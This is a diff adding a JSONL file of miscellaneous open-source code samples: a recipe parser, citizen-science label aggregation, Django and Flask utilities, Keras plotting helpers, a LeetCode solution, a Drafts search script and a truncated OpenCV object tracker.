diff --git "a/2963.jsonl" "b/2963.jsonl" new file mode 100644--- /dev/null +++ "b/2963.jsonl" @@ -0,0 +1,680 @@ +{"seq_id":"652659464","text":"from __init__ import ureg, Q_\nimport re\nfrom fractions import Fraction\n\ndef input_to_measurement(string):\n\t\"\"\"\n\tTake all types of string inputs and convert to a valid measurement. Examples:\n\t1 tbs milk\n\tOne tablespoon butter\n\t1 1/2 cups\n\t2 eggs\n\ttwo eggs\n\t1/2 cup grated parmesan cheese\n\t4 cloves garlic, peeled and chopped\n\t1 medium onion\n\t\"\"\"\n\tamount = 0 #we will += the amount to get a full float instead of fractions.\n\tunit = ''\n\tname = ''\n\tprocess = ''\n\t\n\tif has_unit(string,'lists/units.txt'):\n\t\t#Parse the string into pieces\n\t\tlist = string.split(' ')\n\t\t\n\t\tfor item in list:\n\t\t\tif has_unit(item,'lists/units.txt'):\n\t\t\t\tunit = item\n\t\t\telif is_number(item):\n\t\t\t\tamount += is_number(item)\n\t\t\telif has_unit(item,'lists/processes.txt'):\n\t\t\t\tprocess += item + \" \"\n\t\t\telif has_unit(item,'lists/rubbish.txt'):\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tname += item + \" \"\n\t\t\n\t\tname = name.strip()\n\t\tprocess = process.strip()\n\t\t\n\t\treturn [amount,unit,name,process]\n\ndef has_unit(string,filename):\n\t\"\"\"Check a string input to see if it has an official unit measurement like TBS or Pint.\"\"\"\n\tf = open(filename)\n\twords = f.read()\n\twords = words.split(',')\n\t\n\tstring = string.lower()\n\t\n\tfor word in words:\n\t\tif string.find(word) != -1:\n\t\t\treturn True\n\t\n\treturn False\n\t\t\t\ndef is_number(string):\n\t\"\"\"Check if string is a number or fraction of any kind and return a float value.\"\"\"\n\ttry:\n\t\treturn float(Fraction(string))\n\texcept ValueError:\n\t\treturn False\n\t\ndef best_unit(quantity):\n\t\"\"\"For any type of unit, find the \"best\" unit. Examples:\n\t1 cup is better than 8 tablespoons.\n\t8 cups is better than 64 tablespoons.\n\t1 tablespoon is better than 1/8 cup.\n\t1 teaspoon is better than 1/3 teaspoon.\n\t\"\"\"\n\ndef separate_recipe(string):\n\t\"\"\"Take a recipe and separate it into parts:\n\tTitle, Yield, Ingredients, Directions\"\"\"\n\t\n#Need to make some function to convert volume to grams for a variety of foods. And vice versa. 
Just a table of density constants.\n","sub_path":"cooking.py","file_name":"cooking.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"439640181","text":"\"\"\" Aggregate Zooniverse Classifications to obtain\n Labels for Subjects using the Plurality Algorithm\n Allows for restricting the use of the first N users only to\n Simulate the effect on final labels\n\"\"\"\nimport csv\nimport os\nimport argparse\nimport math\nfrom statistics import median_high, StatisticsError\nfrom collections import defaultdict, OrderedDict\nimport logging\n\nimport pandas as pd\n\nfrom utils.logger import set_logging\nfrom config.cfg import cfg\nfrom aggregations import aggregator\nfrom utils.utils import (\n print_nested_dict, set_file_permission, OrderedCounter)\n\n\nflags = cfg['plurality_aggregation_flags']\nflags_global = cfg['global_processing_flags']\n\n# args = dict()\n# args['annotations'] = '/home/packerc/shared/zooniverse/Exports/ENO/ENO_S1_annotations.csv'\n# args['output_csv'] = '/home/packerc/will5448/ENO_S1_plurality_raw_sim.csv'\n# args['subject_csv'] = '/home/packerc/shared/zooniverse/Exports/ENO/ENO_S1_subjects_extracted.csv'\n# args['export_consensus_only'] = False\n# args['log_dir'] = None\n# args['log_filename'] = ''\n# args['n_users_to_use'] = [1, 2, 5, 10, 99]\n\n\ndef aggregate_species(\n species_names, species_stats,\n questions, question_type_map, n_users_total):\n \"\"\" Aggregate species stats \"\"\"\n species_aggs = {x: OrderedDict() for x in species_names}\n for species, stats in species_stats.items():\n if species not in species_names:\n continue\n for question in questions:\n question_type = question_type_map[question]\n if question_type == 'count':\n # generate multiple count aggregations\n for agg_type in flags['COUNT_AGGREGATION_MODES']:\n agg = aggregator.count_aggregator(\n stats[question], flags, mode=agg_type)\n agg_name = '{}_{}'.format(question, agg_type)\n species_aggs[species][agg_name] = agg\n elif question_type == 'prop':\n agg = aggregator.proportion_affirmative(stats[question])\n species_aggs[species][question] = agg\n elif question_type == 'main':\n continue\n # add overall species stats\n species_aggs[species]['n_users_identified_this_species'] = \\\n len(stats['classification_id'])\n n_user_id = species_aggs[species]['n_users_identified_this_species']\n p_user_id = '{:.2f}'.format(n_user_id / n_users_total)\n species_aggs[species]['p_users_identified_this_species'] = p_user_id\n return species_aggs\n\n\ndef calculate_pielou(votes_list):\n \"\"\" Calculate pielous evenness index\n votes_list: list with the number of votes for each species\n \"\"\"\n if len(votes_list) < 2:\n return 0\n # denominator\n lnS = math.log(len(votes_list))\n # numerator\n sumlist = sum(votes_list)\n plist = [float(n)/sumlist for n in votes_list]\n plnplist = [n * math.log(n) for n in plist]\n sumplnp = -sum(plnplist)\n return sumplnp/lnS\n\n\ndef aggregate_subject_annotations(\n subject_data,\n questions,\n question_type_map,\n question_main_id):\n \"\"\" Aggregate subject annotations \"\"\"\n # initialize Counter objects\n stat_all = defaultdict(OrderedCounter)\n stat_species_only = defaultdict(OrderedCounter)\n # extract and add annotations to stats counters\n for anno_dict in subject_data:\n for k, v in anno_dict.items():\n stat_all[k].update({v})\n # store species only answers\n main_answer = anno_dict[question_main_id]\n if main_answer != flags_global['QUESTION_MAIN_EMPTY']:\n for k, v 
in anno_dict.items():\n stat_species_only[k].update({v})\n # median number of species identifications per user\n # if nobody ids a species, set this to 0\n try:\n n_species_ids_per_user_median = int(\n median_high(stat_species_only['user_name'].values()))\n except StatisticsError:\n n_species_ids_per_user_median = 0\n # get the max number of species identified by any user\n try:\n n_species_ids_per_user_max = int(\n max(stat_species_only['user_name'].values()))\n except ValueError:\n n_species_ids_per_user_max = 0\n # Calculate some statistics\n n_subject_classifications = len(stat_all['classification_id'])\n n_subject_users = len(stat_all['user_name'])\n n_users_id_species = len(stat_species_only['user_name'])\n n_users_id_empty = n_subject_users - n_users_id_species\n p_users_id_species = n_users_id_species / n_subject_users\n # order species by frequency of identifications\n # ties are ordered arbitrarily\n # (according to which species was detected first)\n species_by_frequency = stat_all[question_main_id].most_common()\n species_names_by_frequency = [x[0] for x in species_by_frequency]\n # calc stats for all species\n species_stats = aggregator.stats_for_species(\n species_names_by_frequency, subject_data,\n species_field=question_main_id\n )\n # define empty capture if more volunteers saw nothing\n # than saw something\n is_empty = n_users_id_empty > n_users_id_species\n if is_empty:\n species_aggs = aggregate_species(\n species_names_by_frequency, species_stats,\n questions, question_type_map,\n n_subject_classifications)\n consensus_species = [flags_global['QUESTION_MAIN_EMPTY']]\n pielou = 0\n else:\n species_names_no_empty = [\n x for x in species_names_by_frequency\n if x != flags_global['QUESTION_MAIN_EMPTY']]\n species_aggs = aggregate_species(\n species_names_no_empty, species_stats,\n questions, question_type_map,\n n_users_id_species)\n # calculate pielou\n pielou = calculate_pielou(\n [x['n_users_identified_this_species']\n for x in species_aggs.values()])\n # Determine top / consensus species based on the median number of\n # different species identified by the volunteers\n consensus_species = [species_names_no_empty[i] for i in\n range(n_species_ids_per_user_median)]\n # collect information to be added to the export\n agg_info = {\n 'n_species_ids_per_user_median': n_species_ids_per_user_median,\n 'n_species_ids_per_user_max': n_species_ids_per_user_max,\n 'n_users_classified_this_subject': n_subject_users,\n 'n_users_saw_a_species': n_users_id_species,\n 'n_users_saw_no_species': n_users_id_empty,\n 'p_users_saw_a_species': '{:.2f}'.format(p_users_id_species),\n 'pielous_evenness_index': '{:.2f}'.format(pielou)\n }\n record = {\n 'species_aggregations': species_aggs,\n 'aggregation_info': agg_info,\n 'consensus_species': consensus_species}\n return record\n\n\nif __name__ == '__main__':\n # Parse command line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--annotations\", type=str, required=True,\n help=\"Path to extracted annotations\")\n parser.add_argument(\n \"--output_csv\", type=str, required=True,\n help=\"Path to file to store aggregated annotations.\")\n parser.add_argument(\n \"--export_consensus_only\", action=\"store_true\",\n help=\"Export only species with plurality consensus\")\n parser.add_argument(\n \"--n_users_to_use\", nargs='+', type=int, default=[1, 2, 5, 10, 99],\n help=\"Export only species with plurality consensus\")\n\n parser.add_argument(\n \"--log_dir\", type=str, default=None)\n parser.add_argument(\n 
\"--log_filename\", type=str,\n default='aggregate_annotations_plurality')\n\n args = vars(parser.parse_args())\n\n ######################################\n # Check Input\n ######################################\n\n if not os.path.isfile(args['annotations']):\n raise FileNotFoundError(\n \"annotations: {} not found\".format(\n args['annotations']))\n\n ######################################\n # Configuration\n ######################################\n\n # logging\n set_logging(args['log_dir'], args['log_filename'])\n\n logger = logging.getLogger(__name__)\n\n for k, v in args.items():\n logger.info(\"Argument {}: {}\".format(k, v))\n\n # logging flags\n print_nested_dict('', flags)\n\n question_main_id = flags_global['QUESTION_DELIMITER'].join(\n [flags_global['QUESTION_PREFIX'], flags_global['QUESTION_MAIN']])\n question_column_prefix = '{}{}'.format(\n flags_global['QUESTION_PREFIX'],\n flags_global['QUESTION_DELIMITER'])\n\n ######################################\n # Import Annotations\n ######################################\n\n # Read Annotations and associate with subject id\n subject_annotations = dict()\n with open(args['annotations'], \"r\") as ins:\n csv_reader = csv.reader(ins, delimiter=',', quotechar='\"')\n header = next(csv_reader)\n questions = [x for x in header if x.startswith(question_column_prefix)]\n for line_no, line in enumerate(csv_reader):\n # print status\n if ((line_no % 10000) == 0) and (line_no > 0):\n print(\"Imported {:,} annotations\".format(line_no))\n # convert to dict\n line_dict = {header[i]: x for i, x in enumerate(line)}\n if line_dict['subject_id'] not in subject_annotations:\n subject_annotations[line_dict['subject_id']] = list()\n subject_annotations[line_dict['subject_id']].append(line_dict)\n\n question_type_map = aggregator.create_question_type_map(\n questions, flags, flags_global)\n\n ######################################\n # Aggregate Annotations\n ######################################\n\n def extract_first_n_users_annotations(subject_data, n_users=2):\n \"\"\" Extract annotations of first n users for a subject \"\"\"\n users = OrderedDict([(x['user_name'], 0) for x in subject_data])\n n_users_real = len(users)\n users_to_extract = set(list(users)[0:min(n_users, n_users_real)])\n subject_data_selected = list()\n for annotation in subject_data:\n if annotation['user_name'] in users_to_extract:\n subject_data_selected.append(annotation)\n return subject_data_selected\n\n subject_species_aggregations = dict()\n for num, (subject_id, subject_data) in enumerate(subject_annotations.items()):\n # print status\n if ((num % 10000) == 0) and (num > 0):\n print(\"Aggregated {:,} subjects\".format(num))\n # gradually select more users\n records = list()\n for n_users_to_extract in args['n_users_to_use']:\n subject_data_select = extract_first_n_users_annotations(\n subject_data, n_users=n_users_to_extract)\n record = aggregate_subject_annotations(\n subject_data_select,\n questions,\n question_type_map,\n question_main_id)\n record['aggregation_info']['max_users_used'] = n_users_to_extract\n records.append(record)\n subject_species_aggregations[subject_id] = records\n\n # Create one record per identification\n subject_identificatons = list()\n for subject_id, subject_agg_data_list in subject_species_aggregations.items():\n # export each species\n for subject_agg_data in subject_agg_data_list:\n for sp, species_dat in subject_agg_data['species_aggregations'].items():\n species_is_plurality_consensus = \\\n int(sp in subject_agg_data['consensus_species'])\n 
record = {\n 'subject_id': subject_id,\n question_main_id: sp,\n **species_dat,\n **subject_agg_data['aggregation_info'],\n 'species_is_plurality_consensus': species_is_plurality_consensus}\n subject_identificatons.append(record)\n\n # extract all questions and order them by the original ordering\n questions_original = questions\n questions_found = set()\n for row in subject_identificatons:\n row_questions = list(row.keys())\n questions_found = questions_found.union(\n {x for x in row_questions\n if x.startswith(question_column_prefix)})\n questions = list(questions_found)\n questions = sorted(\n questions,\n key=lambda x: '{}_{}'.format(\n questions_original.index(\n [q for q in questions_original if x.startswith(q)][0]), x))\n\n ######################################\n # Export to CSV\n ######################################\n\n df_out = pd.DataFrame(subject_identificatons)\n\n # order columns: subject_id, questions, rest\n cols = df_out.columns.tolist()\n first_cols = ['subject_id'] + questions\n first_cols = [x for x in first_cols if x in cols]\n cols_rearranged = first_cols + [x for x in cols if x not in first_cols]\n df_out = df_out[cols_rearranged]\n\n # sort output by subject_id\n df_out.sort_values(by=first_cols, inplace=True)\n\n if args['export_consensus_only']:\n df_out = df_out[df_out['species_is_plurality_consensus'] == 1]\n\n df_out.to_csv(args['output_csv'], index=False)\n\n logger.info(\"Wrote {} aggregations to {}\".format(\n df_out.shape[0], args['output_csv']))\n\n # change permmissions to read/write for group\n set_file_permission(args['output_csv'])\n","sub_path":"aggregations/aggregate_plurality_sim.py","file_name":"aggregate_plurality_sim.py","file_ext":"py","file_size_in_byte":13544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"298548221","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('proyectos', '0020_auto_20150813_1815'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='detalleproductoestimacion',\n name='Estimaciones',\n field=models.ForeignKey(blank=True, to='proyectos.Estimaciones', null=True),\n ),\n ]\n","sub_path":"apps/proyectos/migrations/0021_auto_20150813_1822.py","file_name":"0021_auto_20150813_1822.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"277870120","text":"class InvalidLookupCombination(Exception):\n\n def __init__(self, lookup, lookups, value, *args, **kwargs):\n message = (\n \"Lookup: \\\"{}\\\" has non-string return value, must be only lookup \"\n \"present (not {}) in \\\"{}\\\"\"\n ).format(lookup.raw, len(lookups), value)\n super(InvalidLookupCombination, self).__init__(message,\n *args,\n **kwargs)\n\n\nclass UnknownLookupType(Exception):\n\n def __init__(self, lookup, *args, **kwargs):\n message = \"Unknown lookup type: \\\"{}\\\"\".format(lookup.type)\n super(UnknownLookupType, self).__init__(message, *args, **kwargs)\n\n\nclass UnresolvedVariables(Exception):\n\n def __init__(self, blueprint, *args, **kwargs):\n message = \"Blueprint: \\\"%s\\\" hasn't resolved it's variables\" % (\n blueprint.name)\n super(UnresolvedVariables, self).__init__(message, *args, **kwargs)\n\n\nclass UnresolvedVariable(Exception):\n\n def __init__(self, blueprint, variable, *args, **kwargs):\n message = (\n \"Variable \\\"%s\\\" in blueprint 
\\\"%s\\\" hasn't been resolved\"\n ) % (variable.name, blueprint.name)\n super(UnresolvedVariable, self).__init__(message, *args, **kwargs)\n\n\nclass MissingVariable(Exception):\n\n def __init__(self, blueprint, variable_name, *args, **kwargs):\n message = \"Variable \\\"%s\\\" in blueprint \\\"%s\\\" is missing\" % (\n variable_name, blueprint.name)\n super(MissingVariable, self).__init__(message, *args, **kwargs)\n\n\nclass StackDoesNotExist(Exception):\n\n def __init__(self, stack_name, *args, **kwargs):\n message = \"Stack: \\\"%s\\\" does not exist in outputs\" % (stack_name,)\n super(StackDoesNotExist, self).__init__(message, *args, **kwargs)\n\n\nclass MissingParameterException(Exception):\n\n def __init__(self, parameters, *args, **kwargs):\n self.parameters = parameters\n message = \"Missing required cloudformation parameters: %s\" % (\n \", \".join(parameters),\n )\n super(MissingParameterException, self).__init__(message, *args,\n **kwargs)\n\n\nclass MissingLocalParameterException(Exception):\n\n def __init__(self, parameter, *args, **kwargs):\n self.parameter = parameter\n message = \"Missing required local parameter: %s\" % parameter\n super(MissingLocalParameterException, self).__init__(message, *args,\n **kwargs)\n\n\nclass OutputDoesNotExist(Exception):\n\n def __init__(self, stack_name, output, *args, **kwargs):\n self.stack_name = stack_name\n self.output = output\n\n message = \"Output %s does not exist on stack %s\" % (output,\n stack_name)\n super(OutputDoesNotExist, self).__init__(message, *args, **kwargs)\n\n\nclass MissingEnvironment(Exception):\n\n def __init__(self, key, *args, **kwargs):\n self.key = key\n message = \"Environment missing key %s.\" % (key,)\n super(MissingEnvironment, self).__init__(message, *args, **kwargs)\n\n\nclass ImproperlyConfigured(Exception):\n\n def __init__(self, cls, error, *args, **kwargs):\n message = \"Class \\\"%s\\\" is improperly configured: %s\" % (\n cls,\n error,\n )\n super(ImproperlyConfigured, self).__init__(message, *args, **kwargs)\n\n\nclass StackDidNotChange(Exception):\n \"\"\"Exception raised when there are no changes to be made by the\n provider.\n \"\"\"\n\n\nclass CancelExecution(Exception):\n \"\"\"Exception raised when we want to cancel executing the plan.\"\"\"\n","sub_path":"stacker/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"398874932","text":"\"\"\"\nCopyright (c) [2019] [sixlab.cn]\n[https://github.com/PatrickRoot/six-site] is licensed under the Mulan PSL v1.\nYou can use this software according to the terms and conditions of the Mulan PSL v1.\nYou may obtain a copy of Mulan PSL v1 at:\n http://license.coscl.org.cn/MulanPSL\nTHIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR\nPURPOSE.\nSee the Mulan PSL v1 for more details.\n\"\"\"\nimport os\n\nimport markdown\nfrom flask import Blueprint, jsonify, request\n\nfrom config.db import select_one, run_sql\n\napp_api = Blueprint('app_api', __name__)\n\n\n@app_api.route(\"/\")\ndef thought_index():\n return \"api\"\n\n\ndef import_md(filename):\n file_object = open(filename, 'rU')\n count = 0\n\n print(\"开始>>>:\"+filename)\n\n try:\n origin_id = \"\"\n title = \"\"\n date = \"\"\n content_origin = \"\"\n tags = []\n\n for line in file_object:\n line_strip = line.strip()\n if 
line_strip == \"---\":\n count = count + 1\n continue\n if count > 1:\n content_origin = content_origin + line\n continue\n\n if line_strip.startswith(\"id:\"):\n origin_id = line_strip.replace(\"id:\", \"\", 1).strip()\n continue\n if line_strip.startswith(\"title:\"):\n title = line_strip.replace(\"title:\", \"\", 1).strip()\n continue\n if line_strip.startswith(\"date:\"):\n date = line_strip.replace(\"date:\", \"\", 1).strip()\n continue\n if line_strip.startswith(\"- \"):\n tag = line_strip.replace(\"- \", \"\", 1).strip()\n tags.append(tag)\n continue\n if line_strip.startswith(\"categories:\") or line_strip.startswith(\"tags:\"):\n continue\n if line_strip.startswith(\"toc:\") or line_strip.startswith(\"comments:\"):\n continue\n print(\"未知:\" + line_strip)\n\n html = markdown.markdown(content_origin)\n\n run_sql('''\n INSERT INTO app_posts \n (post_type, post_title, post_summary, post_content, post_content_origin, post_status, view_count, thumb_count, comment_count, create_user, create_time) \n VALUES \n ('blog', ?, ?, ?, ?, '1', 0, 0, 0, ?, ?)\n ''', (title, origin_id, html, content_origin, 'import', date))\n\n app_posts = select_one('''\n select *\n from app_posts\n where post_summary = ?\n ''', (origin_id,))\n\n if app_posts:\n post_id = app_posts[\"id\"]\n\n for tag_name in tags:\n app_tags = select_one('''\n select *\n from app_tags\n where tag_name = ?\n ''', (tag_name,))\n\n if not app_tags:\n run_sql('''\n INSERT INTO app_tags \n (tag_name) \n VALUES \n (?);\n ''', (tag_name,))\n\n app_tags = select_one('''\n select *\n from app_tags\n where tag_name = ?\n ''', (tag_name,))\n\n run_sql('''\n INSERT INTO app_posts_tags\n (post_id, tag_id) \n VALUES \n (?, ?)\n ''', (post_id, app_tags[\"id\"]))\n return title\n finally:\n file_object.close()\n\n\n@app_api.route(\"/import/wordpress\", methods=['GET', 'POST'])\ndef import_wordpress():\n hexo_path = '/Users/patrickroot/six_myspace/python/six-site/test'\n if request.args.__contains__(\"path\"):\n hexo_path = request.args\n\n if request.form.__contains__(\"path\"):\n hexo_path = request.form['path']\n\n count = 0\n files = []\n if hexo_path:\n for filename in os.listdir(hexo_path):\n filename = os.path.join(hexo_path, filename)\n if filename.endswith(\".md\") and os.path.isfile(filename):\n files.append(import_md(filename))\n count = count + 1\n\n return jsonify({\n\n })\n","sub_path":"apps/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"48868317","text":"import warnings; warnings.filterwarnings('ignore')\nimport tensorflow as tf\nimport tensorflow.keras.layers as tkl\nimport tensorflow.keras.utils as tku\nfrom IPython.core.magic import register_line_magic\nfrom IPython.display import display\n\n@register_line_magic\ndef get_model_plot1d(pars):\n pars=pars.split()\n num_timesteps=int(pars[0])\n num_features=int(pars[1])\n num_filters=int(pars[2])\n ks=int(pars[3])\n ps=int(pars[4])\n model=tf.keras.Sequential()\n model.add(tkl.InputLayer((num_timesteps,\n num_features),\n name='input'))\n model.add(tkl.Conv1D(\n filters=num_filters,\n kernel_size=ks,\n padding='same',name='conv1d',\n activation='relu'))\n model.add(tkl.MaxPool1D(\n pool_size=ps,name='pool1d'))\n display(tku.plot_model(model,show_shapes=True))\n\n@register_line_magic\ndef get_model_plot2d(pars):\n pars=pars.split()\n img_size=int(pars[0])\n num_channels=int(pars[1])\n num_filters=int(pars[2])\n ks=int(pars[3])\n ps=int(pars[4])\n 
model=tf.keras.Sequential()\n model.add(tkl.InputLayer((img_size,img_size,\n num_channels),\n name='input'))\n model.add(tkl.Conv2D(\n filters=num_filters,\n kernel_size=(ks,ks),strides=(1,1),\n padding='same',name='conv2d',\n activation='relu'))\n model.add(tkl.MaxPool2D(\n pool_size=(ps,ps),name='pool2d'))\n display(tku.plot_model(model,show_shapes=True))\n","sub_path":"python_recipes/keras_model_plot12d.py","file_name":"keras_model_plot12d.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"430845573","text":"#\n# @lc app=leetcode id=374 lang=python3\n#\n# [374] Guess Number Higher or Lower\n#\n\n# @lc code=start\n# The guess API is already defined for you.\n# @return -1 if my number is lower, 1 if my number is higher, otherwise return 0\n# def guess(num: int) -> int:\n\nclass Solution:\n def guessNumber(self, n: int) -> int:\n # * 二分法找数字\n\n return int(self.binaryGuess(1, n))\n def binaryGuess(self, left, right):\n\n mid = (left + right) / 2\n res = guess(mid)\n if res == 0:\n return mid\n elif res == 1:\n # 说明数字比mid大\n left = mid + 1\n return self.binaryGuess(left, right)\n elif res == -1:\n # 说明数字比mid小\n right = mid - 1\n return self.binaryGuess(left, right)\n \n# @lc code=end\n\n","sub_path":"leetcode/374/374.guess-number-higher-or-lower.py","file_name":"374.guess-number-higher-or-lower.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"578304424","text":"#!/usr/bin/env python3\n\nimport sqlite3\nimport sys\nimport time\nimport json\nimport unicodedata as ud\nfrom contextlib import closing\nfrom os.path import expanduser\n\ndef searchDraft(strSearch):\n\tstrPathDB = expanduser(\"~\") + \"/Library/Group Containers/GTFQ98J4YG.com.agiletortoise.Drafts/DraftStore.sqlite\"\n\t\n\twith closing(sqlite3.connect(strPathDB)) as connection:\n\t\twith closing(connection.cursor()) as cursor:\n\t\t\trows = cursor.execute(\"select ZUUID, ZCONTENT, ZCREATED_AT, ZCHANGED_AT from main.ZMANAGEDDRAFT where ZCONTENT like '%{}%' and ZFOLDER != 10000;\".format(strSearch)).fetchall()\n\t\t\treturn rows\n\n\n# Combine the arguments we want\nstrArg = ' '.join(sys.argv[1:])\n# Normalise any decomposed UTF-8 text from Alfred to composed UTF-8 test to use with SQLite\nstrArg = ud.normalize('NFC',strArg)\n\nintSQLLiteEpoch = 978307200\ndraftMatch = searchDraft(strArg)\narrItems = []\nfor x in draftMatch:\n\tobjItem = {}\n\tobjItem['title'] = x[1].partition('\\n')[0]\n\tobjItem['subtitle'] = \"Modified: \" + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(x[3] + intSQLLiteEpoch)) + \" | Created: \" + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(x[2] + intSQLLiteEpoch))\n\tobjItem['arg'] = x[1]\n\tarrItems.append(objItem)\n\nobjOutput = { \"items\" : arrItems }\nsys.stdout.write(json.dumps(objOutput))\n\t\t","sub_path":"workflows/user.workflow.159049AE-8473-43F8-ACED-0AFD0BAC9E49/copy_content.py","file_name":"copy_content.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"344129460","text":"import inspect\nfrom rest_framework.viewsets import GenericViewSet as BaseGenericViewSet\nfrom rest_framework.metadata import SimpleMetadata\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db import models\n\n\ndef set_if_none(cls, name, value):\n if not hasattr(cls, name) or getattr(cls, name) is None:\n 
setattr(cls, name, value)\n\n\nclass SchemaMeta(type):\n def __new__(cls, cls_name, super_classes, attrs):\n initiated_class = super().__new__(cls, cls_name, super_classes, attrs)\n if cls_name == \"GenericViewSet\":\n return initiated_class\n\n try:\n meta = attrs.pop(\"Meta\")\n except KeyError:\n raise ImproperlyConfigured(\"Meta should be defined on %s\" % cls_name)\n\n try:\n model = getattr(meta, \"model\")\n except AttributeError:\n raise ImproperlyConfigured(\n \"Meta in %s should contain at least a model\" % cls_name\n )\n\n if not (inspect.isclass(model) and issubclass(model, models.Model)):\n raise ImproperlyConfigured(\n \"model:%s in %s Meta should inherirt from Model\" % (model, cls_name)\n )\n\n try:\n api = getattr(model, \"Api\")\n except AttributeError:\n raise ImproperlyConfigured(\n \"model:%s for %s Meta should declare Api class\" % (model, cls_name)\n )\n\n key = getattr(meta, \"key\", \"default\")\n\n set_if_none(initiated_class, \"queryset\", model.objects.all())\n set_if_none(initiated_class, \"serializer_class\", api.get_serializer(key))\n set_if_none(initiated_class, \"search_fields\", api.search_fields)\n setattr(initiated_class, \"api\", api)\n setattr(api, \"viewset\", initiated_class)\n return initiated_class\n\n\nclass GenericViewSet(BaseGenericViewSet, metaclass=SchemaMeta):\n serializer_classes = {}\n querysets = {}\n filterset_classes = {}\n\n def get_serializer_class(self):\n default = super().get_serializer_class()\n if hasattr(self, \"action\"):\n return self.serializer_classes.get(self.action, default)\n return default\n\n def get_queryset(self, request=None):\n default = super().get_queryset()\n if hasattr(self, \"action\"):\n return self.querysets.get(self.action, default)(request=self.request)\n return default(request=self.request)\n\n def get_filterset_class(self):\n default = super().get_filterset_class()\n if hasattr(self, \"action\"):\n return self.filterset_classes.get(self.action, default)\n return default\n","sub_path":"{{cookiecutter.project_slug}}/api/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"647089170","text":"import datetime\n\n\nclass AnnotationData(object):\n def __init__(self, text='', label='', uuid=0, dataset_id=0, time_stamp=datetime.datetime.now()):\n self.text = text\n self.label = label\n self.uuid = uuid\n self.dataset_id = dataset_id\n self.time_stamp = time_stamp\n","sub_path":"chi_annotator/webui/webuiapis/apis/mongomodel.py","file_name":"mongomodel.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"46664656","text":"''' Constructs a videocapture device on either webcam or a disk movie file.\nPress q to exit\nOriginal boiler plate code (mouse events, window capture) by Junaed Sattar\nOctober 2018\n'''\nfrom __future__ import division\nimport numpy as np\nimport cv2\nimport sys\nimport random\nimport math\nimport time\n\nfrom matplotlib import pyplot as plt\nfrom typing import List\n\nfrom BoundingBox import BoundingBox\nfrom Particles import Particles\n\n'''global data common to all vision algorithms'''\n'''Mr. 
Global Arrays would be proud'''\nisTracking = False\nr = g = b = 0.0\nimage = np.zeros((640, 480, 3), np.uint8)\ntrackedImage = np.zeros((640, 480, 3), np.uint8)\nimageWidth = 0\nimageHeight = 0\n\nwidth = 60\nheight = 60\ncurrent_x = []\ncurrent_y = []\nhacky_click_has_occurred = False\n\n\n# Mouse Callback function\ndef clickHandler(event, x, y, flags, param) -> None:\n global current_x\n global current_y\n global hacky_click_has_occurred\n\n if event == cv2.EVENT_LBUTTONUP:\n print('left button released')\n current_x.append(x)\n current_y.append(y)\n hacky_click_has_occurred = True\n\n\ndef calculate_histogram(bounding_box: BoundingBox, img):\n min_x = bounding_box.bottomleft_x\n max_x = bounding_box.bottomleft_x + bounding_box.width\n min_y = bounding_box.bottomleft_y\n max_y = bounding_box.bottomleft_y + bounding_box.height\n\n mask = np.zeros(img.shape[:2], np.uint8)\n mask[int(min_x):int(max_x), int(min_y):int(max_y)] = 255\n histogram = cv2.calcHist([img], [0], mask, [9], [0, 180])\n return histogram\n\n\ndef draw(window, image, colour: (int, int, int)) -> None:\n (bottom_x, bottom_y, width, height) = window\n cv2.rectangle(image, (bottom_x, bottom_y), (bottom_x + width, bottom_y + height), colour, 2)\n\n\ndef captureVideo(src) -> None:\n global image, isTracking, trackedImage, current_x, current_y\n\n cap = cv2.VideoCapture(src)\n if cap.isOpened() and src == '0':\n ret = cap.set(3, 640) and cap.set(4, 480)\n if ret == False:\n print('Cannot set frame properties, returning')\n return\n else:\n frate = cap.get(cv2.CAP_PROP_FPS)\n print(frate, ' is the framerate')\n waitTime = int(1000 / frate)\n\n #\twaitTime = time/image. Adjust accordingly.\n if src == 0:\n waitTime = 1\n if cap:\n print('Succesfully set up capture device')\n else:\n print('Failed to setup capture device')\n\n windowName = 'Mean Shift Vector, press q to quit'\n cv2.namedWindow(windowName)\n cv2.setMouseCallback(windowName, clickHandler)\n\n ret, image = cap.read()\n\n # OpenCV docs - first 5 is the # iterations, second 5 is the min pixels to move before stopping... 
